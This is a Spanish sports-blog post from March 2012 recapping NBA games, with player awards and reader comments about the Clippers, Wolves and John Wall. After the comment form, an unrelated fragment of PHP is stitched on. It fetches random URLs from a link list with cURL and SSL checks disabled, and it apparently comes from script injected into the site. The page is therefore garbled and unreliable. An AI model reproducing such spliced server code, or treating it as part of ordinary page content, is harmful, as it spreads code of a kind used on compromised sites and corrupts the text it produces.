La Crónica: El día después

16 de March de 2012 por TheDeerHunter

Algunos amanecemos aún con las heridas abiertas tras este deadline de sabor decepcionante. Uno se siente particularmente afectado, como entenderéis, por el adiós de Fisher y también el de McMillan. Pero el show debe continuar y ayer lo hizo con una jornada de transición.

En el partido más emocionante los Wolves lograron forzar la prórroga en Salt Lake City, en un último cuarto estrambótico donde neutralizaron una buena desventaja en los últimos instantes, pero permitieron que a falta de 7 décimas Paul Millsap lanzara bajo el aro para ganar. Incomprensiblemente la falló. Fue el banco de los Jazz, en una extraordinaria actuación de Gordon Hayward y Alec Burks, lo que desequilibró la balanza en el tiempo extra (105-111). Con la caída en desgracia de los Wolves se abre una pequeña brecha entre el 8º de playoffs y los aspirantes, como pueden ser los Suns o los propios Jazz.

Así, los “soles”, sin Nash ni Grant Hill le tocaron la cara a unos Clippers en modo desinfle (91-87). Ni el gran partido de Griffin, ni la actuación más digna de Butler en tiempo evitó una nueva decepción. Con un balance de 4-6 en los últimos 10 partidos, los Clippers caen hasta la 5ª plaza del Oeste con el añadido psicológico de ser superados por los vecinos. Los Suns, como decimos, recuperan opciones de cara a postemporada.

Thunder ganaron bien a Nuggets (103-90) o, lo que es lo mismo, Durant, Westbrook y Harden fueron mejores que Gallinari, Afflalo y Andre Miller. Rudy estuvo muy gris en su segundo partido tras la lesión.

Finalmente los Mavs no tuvieron problemas con Charlotte (96-101) y Wizards sumaron su 4ª victoria foránea del curso en Nueva Orleans (99-89), con Wall tirando del carro.

PREMIOS

MVP: Sin actuaciones muy destacadas esta jornada el premio se lo lleva John Wall que aportó 26 puntos y 12 asistencias en la victoria de los Wizards, con 11 de 16 en tiros de campo. Otros candidatos se quedaron cerca, como Dirk Nowitzki con 27-6-5 o Kevin Durant con 24-8-2.

Rookie: Tampoco en esta categoría hubo una aparición estelar. Los 12 puntos, 5 rebotes y 4 asistencias de Kemba Walker no sirvieron de mucho a los Bobcats, así que nos quedaremos con un jugador no muy habitual por aquí, Alec Burks, quien sí colaboró en la victoria de los Jazz con 15 puntos.

Sorpresa: Cada vez son menos sorpresa las actuaciones de Nikola Pekovic. Lejos de ser un fino estilista, el montenegrino se afianza como un center  muy aprovechable en la liga, 20 puntos y 9 rebotes. Su compañero Luke Ridnour hace olvidar a Rubio con sus 18 puntos y 13 asistencias. Premio compartido en este caso.

Decepción: Lamar Odom sigue buscando su sitio en los Mavs, 2 puntos y 5 rebotes parecen un escaso bagaje para un jugador como él. Sin embargo la decepción hoy se la lleva uno de los nuestros, Serge Ibaka con sus 5 puntos y 3 rebotes. Esperamos bastante más de él.

Esfuerzo en vano: Jugadores interiores copan este apartado, Chris Kaman y Blake Griffin tuvieron buenos números, pero este premio cuando no ganan los Wolves es casi siempre propiedad de Kevin Love, 25-16. El nivel al que ha llegado la criatura es brutal.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Como me gusta Gordon Hayward!

      Citar

  2. MagicJohnson32 dice:
    #2

    Ojo con John Wall, que sin Nick Young y McGee puede echarse el equipo a la espalda de verdad como se esperaba.

      Citar

  3. Nacho dice:
    #3

    Love lleva unos días que debería mirarse lo del tiro. Está bajando y mucho, en porcentajes. Aunque igual la cago, porque de los últimos partidos solo vi uno y no jugaba. Es la mierda de fijarse en el box score. Si alguien lo ha visto que me diga si realmente está un poco fallón. Parece que los Wolves llevan un aura como de tristeza, si cogen un poco la sonrisa, aunque ahora estén lejos, les sigo viendo posibilidades de PO.
    Para los Clippers están superando a los Knicks en la comparativa con el Atleti. A ver si Chris Paul no se convierte en un Kun, pero yéndose de verdad a la otra orilla. No perderán su plaza de PO, pero que no se descuiden. La desidia es muy mala, y para algunos equipos muy fácil cogerla tras derrotas varias seguidas. Veremos si el votado por muchos como coach del año es capaz de enderezarlo. Me repito, repito y repito, en gran fracaso de la temporada. (Luego vendrán los PO y me callarán la boca, aunque lo dudo)

      Citar

  4. melo15 dice:
    #4

    John Wall, esta cumpliendo las expectativas, esta haciendo una muy buena temporada, pero con el equipo que tien…
    Vaya cagada de los Wizards seleccionando a Vasely, podrian haber vendido la ronda o algo.

      Citar

  5. simon dice:
    #5

    Nacho:
    Love lleva unos días que debería mirarse lo del tiro. Está bajandoy mucho, en porcentajes. Aunque igual la cago, porque de los últimos partidos solo vi uno y no jugaba. Es la mierda de fijarse en el box score. Si alguien lo ha visto que me diga si realmente está un poco fallón. Parece que los Wolves llevan un aura como de tristeza, si cogen un poco la sonrisa, aunque ahora estén lejos, les sigo viendo posibilidades de PO.
    Para los Clippers están superando a los Knicks en la comparativa con el Atleti. A ver si Chris Paul no se convierte en un Kun, pero yéndose de verdad a la otra orilla. No perderán su plaza de PO, pero que no se descuiden. La desidia es muy mala, y para algunos equipos muy fácil cogerla tras derrotas varias seguidas. Veremos si el votado por muchos como coach del año es capaz de enderezarlo. Me repito, repito y repito, en gran fracaso de la temporada. (Luego vendrán los PO y me callarán la boca, aunque lo dudo)

    Tranquilo Nacho yo estaré contigo recibiendo los palos que nos van a dar contigo pq opino que la temporada de los Clippers es un fracaso y en PO se van a las primeras de cambio solo hay un jugador que veo capaz de mantener sus numeros con las defensas de PO y es Chris Paul, a los demas los veo bajando muchos enteros.

      Citar

  6. Nacho dice:
    #6

    simon: Tranquilo Nacho yo estaré contigo recibiendo los palos que nos van a dar contigo pq opino que la temporada de los Clippers es un fracaso y en PO se van a las primeras de cambio solo hay un jugador que veo capaz de mantener sus numeros con las defensas de PO y es Chris Paul, a los demas los veo bajando muchos enteros.

    Es que al ritmo que van tendrían que mirar lo que hacen por detrás, porque los lobos están a tres partidos, y tienen mejor record en la conferencia, que es donde se va a decidir todo. No creo que les pase, pero como tonteen un poco más hasta podrían quedarse sin PO.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>